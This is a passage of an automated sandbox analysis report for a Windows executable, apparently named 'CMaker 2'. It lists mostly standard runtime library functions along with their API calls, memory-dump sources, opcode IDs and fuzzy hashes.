                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                  • Opcode ID: 4bce210e197046ffe348e7a14864d607a673f15493918c1003c5f58545c9a52e
                                                                                                                                                                                  • Instruction ID: bd91c1054d8b031c15a9c4be533d474f94fb08711b9c0003abdc50652361a1ac
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bce210e197046ffe348e7a14864d607a673f15493918c1003c5f58545c9a52e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 89D09E98B0870352FB546FB19C9917D12215F59741F54A4BCC83FC63E7FD2CA44D4600
                                                                                                                                                                                  Function 00007FF6FABEE534 Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: 16af8936fa4a8cfb084170ab3fdfe968383d28d333c1f7fec82ea00825d56c1b
                                                                                                                                                                                  • Instruction ID: 0d944b76c3a0a486452a833920b81a7f533ab57ada5ff39e63f3a89c797b0e31
                                                                                                                                                                                  • Opcode Fuzzy Hash: 16af8936fa4a8cfb084170ab3fdfe968383d28d333c1f7fec82ea00825d56c1b
                                                                                                                                                                                  • Instruction Fuzzy Hash: CA511671B1968256FB289E25944067A66D1BF42BA4F8887B4DE7DC37C6FF7CE4008700
                                                                                                                                                                                  Function 00007FF6FABEB09C Relevance: 3.1, APIs: 2, Instructions: 102COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1236291503-0
                                                                                                                                                                                  • Opcode ID: 6551513a98c324d7d7ba12c955d8146a8b4f51f5bb9c93bdc58fe40068057fbf
                                                                                                                                                                                  • Instruction ID: 94a78f0cf88e467c4d106e3aec20244f6077ffdb98d14b7522bbcface01ac7b6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6551513a98c324d7d7ba12c955d8146a8b4f51f5bb9c93bdc58fe40068057fbf
                                                                                                                                                                                  • Instruction Fuzzy Hash: DF313D25E1820382FB14AB65E5913B91391AF47784FC490F9E93ECB2D7FE6CE8049741
                                                                                                                                                                                  Function 00007FF6FABFC08C Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileHandleType
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3000768030-0
                                                                                                                                                                                  • Opcode ID: 0f9b56d894b59bf5b7e8383ca5e0cbe51dcfa835e806d662f5735474265d4d92
                                                                                                                                                                                  • Instruction ID: 8f9c13eb57b1dc536045943345398cc86d50a99d77232cf0eff2b97065dbff5e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f9b56d894b59bf5b7e8383ca5e0cbe51dcfa835e806d662f5735474265d4d92
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A318426A18B4681DB608F58A5541796650FB47BB0FA8137DDB7E873E0DF38E9A1E300
                                                                                                                                                                                  Function 00007FF6FABFBDA8 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF6FABFBD94,?,?,?,00000000,?,00007FF6FABFBE9D), ref: 00007FF6FABFBDF4
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00007FF6FABFBD94,?,?,?,00000000,?,00007FF6FABFBE9D), ref: 00007FF6FABFBDFE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                                  • Opcode ID: ede5fc4d7b12468b8e87ad72fb039376ac055e7d4bec884aeb090efb761c461e
                                                                                                                                                                                  • Instruction ID: 260cdb23218bc496dc00b819130208203484408313b013ace6e31e54ca0b1c5c
                                                                                                                                                                                  • Opcode Fuzzy Hash: ede5fc4d7b12468b8e87ad72fb039376ac055e7d4bec884aeb090efb761c461e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 58110166608A8185DB108B25E8000696361AB42BF4F984375EE7E8B7E9EF3CD0508700
                                                                                                                                                                                  Function 00007FF6FABF5740 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FABF5655), ref: 00007FF6FABF5773
                                                                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FABF5655), ref: 00007FF6FABF5789
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1707611234-0
                                                                                                                                                                                  • Opcode ID: 1a48e367c3bcc601e4231cdc56bfaaf5c96f1a8981f103ea833fe94a6564b596
                                                                                                                                                                                  • Instruction ID: 6d832b904e5fc135e5343bd2c055b5f78f0f2eb57e795624939599a18fc55a97
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a48e367c3bcc601e4231cdc56bfaaf5c96f1a8981f103ea833fe94a6564b596
                                                                                                                                                                                  • Instruction Fuzzy Hash: EE11917560C642C1EB548B55A40103EB7B4FB86B61F94037AEABEC19E9FF2CD054CB00
                                                                                                                                                                                  Function 00007FF6FABFA0E4 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA0FA
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA104
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                                  • Opcode ID: 042bc8721a3345eaabeb78b0f294181831f5ba70ab5432ae3c86ec800ea28b45
                                                                                                                                                                                  • Instruction ID: 71257476fbf18d79ce36eef1ef414b87ea737ca4733f86ee20adad4ceded9e5e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 042bc8721a3345eaabeb78b0f294181831f5ba70ab5432ae3c86ec800ea28b45
                                                                                                                                                                                  • Instruction Fuzzy Hash: FCE08C54F2920686FF08AFF2D84A03916A45F86B40F8890B8C92EC62D2FE2C69918310
                                                                                                                                                                                  Function 00007FF6FABFA6E0 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,?,00007FF6FABFA55D,?,?,00000000,00007FF6FABFA612), ref: 00007FF6FABFA74E
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF6FABFA55D,?,?,00000000,00007FF6FABFA612), ref: 00007FF6FABFA758
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 918212764-0
                                                                                                                                                                                  • Opcode ID: fa9ac4c151c8ebe2f15a9508e0179b12dcacbbb1569cdd32a455063ae332efe8
                                                                                                                                                                                  • Instruction ID: 69abfc3edcffe8d1dd67eb7298bdbcb29d1ed8a6084e6d602a51513fb45ae67f
                                                                                                                                                                                  • Opcode Fuzzy Hash: fa9ac4c151c8ebe2f15a9508e0179b12dcacbbb1569cdd32a455063ae332efe8
                                                                                                                                                                                  • Instruction Fuzzy Hash: D721F615B1C64241FF5497E5A49027916A25F86BA0F8C82BDDA3EC77D3FE6CB4454300
                                                                                                                                                                                  Function 00007FF6FABFBB20 Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: 9c76a4e681e594104f4523bfd35931576daf33ce7176397f1aef5dc9e32fad31
                                                                                                                                                                                  • Instruction ID: 457d91623bbe1a8170b164b8524305621adeb3c4244010a7fc4349c327bc68e7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c76a4e681e594104f4523bfd35931576daf33ce7176397f1aef5dc9e32fad31
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F41E536A18205CBEB288B59E55027973A0EB57B80F980178D7AEC36D5EF2DE402C751
                                                                                                                                                                                  Function 00007FF6FABE6870 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _fread_nolock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 840049012-0
                                                                                                                                                                                  • Opcode ID: 8c844d6f8503df5aee10f6e9fa1b41c48229a7534358f50c5bfe35e86bfe2d9e
                                                                                                                                                                                  • Instruction ID: 04ab0b4fa61bd5dcff72f4a47117141f28c4c77c5aacc3cc9d37692d7580e5a0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c844d6f8503df5aee10f6e9fa1b41c48229a7534358f50c5bfe35e86bfe2d9e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8221BF25B0829245FB149B6268943BA9651BF4ABC4FCC50F0EE2C8B7C6EE7CE841C200
                                                                                                                                                                                  Function 00007FF6FABFB5B0 Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: 03a38d327754cf904243aec50eb766fa9dc5ae6cf5c4f94ce4342806ccce901e
                                                                                                                                                                                  • Instruction ID: c9e9998d5ed24129563c22849d9ffcb48eea977f65cdc66d5a01b76ebced5f7d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 03a38d327754cf904243aec50eb766fa9dc5ae6cf5c4f94ce4342806ccce901e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 60318126A286129AFB116F95CC4137C6A50AF42B94FC941B9D93D933D2EF7CE4418710
                                                                                                                                                                                  Function 00007FF6FABF9519 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                                                                  • Opcode ID: 17f176ca5aa3c2f8f98eb4cc2a4ffa9626262bee32bb74a9f5e9abb4ca5ae358
                                                                                                                                                                                  • Instruction ID: 317aa114d44f643121f157184ce81799ab20b9a7db8569d78d376a244af95e21
                                                                                                                                                                                  • Opcode Fuzzy Hash: 17f176ca5aa3c2f8f98eb4cc2a4ffa9626262bee32bb74a9f5e9abb4ca5ae358
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B21923AE0474689EB249FA4C4402FC33A0FB49718F98467ADB2D87AC9EF38D544C780
                                                                                                                                                                                  Function 00007FF6FABF5DB4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: f30853ad75514671e950d83128d7baef55a0632a96fda8d571026010811b12de
                                                                                                                                                                                  • Instruction ID: 028fac1dce5106bc847249e952b8ff20d19388232c66c18b125eeeb49f4bc5cd
                                                                                                                                                                                  • Opcode Fuzzy Hash: f30853ad75514671e950d83128d7baef55a0632a96fda8d571026010811b12de
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2511C32DA2E64281EF209F91D40067DA668BF87B80FCC4179EB6C97AC6EF3CD4108700
                                                                                                                                                                                  Function 00007FF6FAC0643C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: 43c547841bdc5efa225ed36a7927e0e9c3599d8d1a01592de04ca1d2ac77ad37
                                                                                                                                                                                  • Instruction ID: 8bd48880803b86f2f387b8c157bbccada6e1ca8bf7faf4e197f78a48c96637f8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 43c547841bdc5efa225ed36a7927e0e9c3599d8d1a01592de04ca1d2ac77ad37
